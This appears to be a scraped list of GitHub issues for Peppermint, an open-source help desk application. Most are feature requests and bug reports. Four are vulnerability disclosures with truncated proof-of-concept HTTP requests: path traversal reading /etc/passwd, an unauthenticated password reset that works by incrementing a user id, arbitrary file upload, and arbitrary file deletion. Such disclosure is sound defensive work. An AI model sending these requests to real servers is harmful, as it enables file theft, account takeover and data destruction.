peppermint
An open source ticket management & help desk solution. A Zendesk/Freshdesk alternative.
Hello, it would be really nice if peppermint can fetch mails from an IMAP account and create tickets based on this.
The application allows users to download files. The `filepath` parameter is vulnerable to a path traversal resulting in reading/downloading arbitrary files from the server.
```http
POST /api/v1/users/file/download?filepath=./../../../../../etc/passwd HTTP/1.1
Host: localhost:5000...
```
The password reset endpoint (`/api/v1/users/resetpassword`) allows any unauthenticated user to change passwords of any other user by just incrementing the `id` JSON parameter.
```
POST /api/v1/users/resetpassword HTTP/1.1
Host: localhost:5000
Content-Length:...
```
An attacker can upload files to any location on the server. The following request creates a text file in `/etc/hacked.txt`.
```http
POST /api/v1/users/file/upload HTTP/1.1
Host: localhost:5000
Content-Length: 608
Pragma: no-cache...
```
The application does not properly filter the `path` JSON parameter in the `/api/v1/users/file/delete` endpoint. This results in arbitrary file deletion.
```
DELETE /api/v1/users/file/delete HTTP/1.1
Host: localhost:5000
Content-Length: 57
Pragma: no-cache...
```
I think it would be nice to be able to completely remove these entities when/if they are no longer needed. Thanks!
I would like tools that embrace doing one thing well in the server realm, as they do on my computer. For that, the ticketing should only handle the tickets and,...
Add support to sending when certain jobs are completed - Ticket Creation / Ticket completion - Client Creation - User Creation / User password reset from log in page /...
Safari browser user here. Adding a ticket and working on it results in the ticket getting created. Still moving from sections will not result in changes being visible unless you do...
If you place peppermint behind some kind of loadbalancer or proxy where the BASE_URL might not be reachable from within the container, logins will fail with an error like this:...